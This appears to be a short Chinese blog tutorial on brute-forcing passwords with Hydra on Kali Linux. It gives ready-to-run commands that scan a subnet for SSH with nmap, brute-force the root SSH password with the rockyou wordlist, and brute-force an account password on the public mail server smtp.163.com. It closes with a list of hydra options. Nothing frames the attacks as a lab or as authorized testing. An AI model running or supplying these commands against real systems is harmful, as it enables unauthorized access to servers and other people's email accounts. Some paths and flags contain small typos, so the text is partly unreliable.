Kail Linux有一个的GUI版本:xhydra,也有一个命令行版本:hydra。
xhydra:
hydra:
我使用命令行版本:hydra
字典
这种攻击需要字典文件,一个好的字典至关重要。我以Kali Linux自带的rockyou字典为例,位于/user/share/wordlists/rockyou.txt.gz。
使用前先解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz
nmap确定开启ssh服务的主机
nmap -p 22 -open -sV 172.16.1.1/24
暴力破解
hydra -s 22 -v -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.108 ssh
爆破邮箱密码
hydra -S -l test@163.com -P /usr/share/wordlists/rockyou.txt -e ns -V -s 465 -t 1 smtp.163.com smtp
下面贴一个用法
hydra用法: hydra <参数> <IP地址> <服务名> hydra的参数是区分大小写的. hydra支持的服务有:telnet ftp ssh mysql mssql vnc pcanywhere RDP(3389)等. hydra的一些参数: -R 继续从上一次的进度开始爆破 -s <port> 指定端口 -l <username> 指定登录的用户名 -L <username-list> 指定用户名字典 -p <password> 指定密码 -t <number> 设置线程数 -P <passwd-list> 指定密码字典 -v 显示详细过程